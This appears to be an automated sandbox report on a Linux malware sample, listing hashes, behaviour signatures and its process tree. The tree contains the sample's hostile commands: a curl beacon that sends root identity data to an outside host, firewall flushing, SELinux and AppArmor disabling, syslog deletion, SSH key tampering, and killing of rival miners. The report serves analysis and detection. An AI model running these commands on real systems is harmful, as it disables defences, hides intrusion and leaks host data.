Analysis
-
max time kernel
150s -
max time network
28s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
-
submitted
07-03-2024 08:39
General
-
Target
b84ec8d2286ecb64f4164633be39421b
-
Size
60KB
-
MD5
b84ec8d2286ecb64f4164633be39421b
-
SHA1
7b09fb48eefb27acadf53aed331a24211ce78a72
-
SHA256
71b478d4ad418cfb6ec620ea213a3f5c6a64bd34f23d8f43de81df01465bcbad
-
SHA512
f31cbcf9b8a6e935f8ca8341aac462c059a1c08ddeba4986fbd7d2224917bdbaad21d1fb0dfb437b9385998c74e856c36387e7785018f4bea8cc4a217ce87844
-
SSDEEP
1536:/F2cc2/ndOQvL0KKGdAkKFOmm5air0TI9:/F2ccQh2v47ccyI9
Score
7/10
Malware Config
Signatures
-
Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Disables AppArmor 28 IoCs
Disables AppArmor security module.
-
Disables SELinux 10 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 32 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/b84ec8d2286ecb64f4164633be39421b/tmp/b84ec8d2286ecb64f4164633be39421b1⤵
-
/usr/bin/idid2⤵
-
-
/usr/bin/curlcurl "http://oracle.zzhreceive.top/b2f628/idcheck/uid=0(root) gid=0(root) groups=0(root)"2⤵
-
-
/bin/mkdirmkdir /var/tmp/.system -p2⤵
-
-
/bin/rmrm -rf /var/log/syslog2⤵
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"2⤵
- Reads CPU attributes
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
-
/bin/rmrm -rf /tmp/keys2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
-
-
/usr/sbin/serviceservice apparmor stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
- Enumerates kernel/hardware configuration
-
-
-
/usr/local/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl disable apparmor2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/usr/sbin/serviceservice aliyun.service stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
-
/usr/local/sbin/systemctlsystemctl stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/sbin/systemctlsystemctl stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl stop aliyun.service.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl disable aliyun.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/grepgrep 185.71.65.2382⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 140.82.52.872⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :4432⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :232⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :4432⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :1432⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :22222⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :33892⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :66662⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :66652⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep :66672⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :77772⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :84442⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :33472⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep "kworker -c\\"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep log_2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep systemten2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep netns2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/local/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/local/bin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/bin/killkill -9 103⤵
- Disables SELinux
-
-
/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/bin/killkill -9 103⤵
- Disables SELinux
-
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep voltuned2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep darwin2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep /tmp/dl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep /tmp/ddg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep /tmp/pprt2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep /tmp/ppol2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 45.76.122.922⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep 51.38.191.1782⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 51.15.56.1612⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 86s.jpg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep aGTSGJJp2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep I0r8Jyyt2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep AgdgACUD2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep uiZvwxG82⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep BtwXn5qH2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 3XEzey2T2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep t2tKrCSZ2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep svc2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep HD7fcBgg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep zXcDajSs2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 3lmigMo2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep AkMK4A22⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep AJ2AkKe2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep HiPxCJRS2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep http_0xCC0302⤵
- Disables SELinux
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep http_0xCC0312⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep http_0xCC0322⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep http_0xCC0332⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep C4iLM4L2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep /boot/vmlinuz2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep i4b503a52cc52⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep nqscheduler2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep "]"2⤵
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 0kwti6ut420t2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v /2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep -v _2⤵
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep "\\[^"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep rsync2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep watchd0g2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 158.69.133.18:82202⤵
- Disables SELinux
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
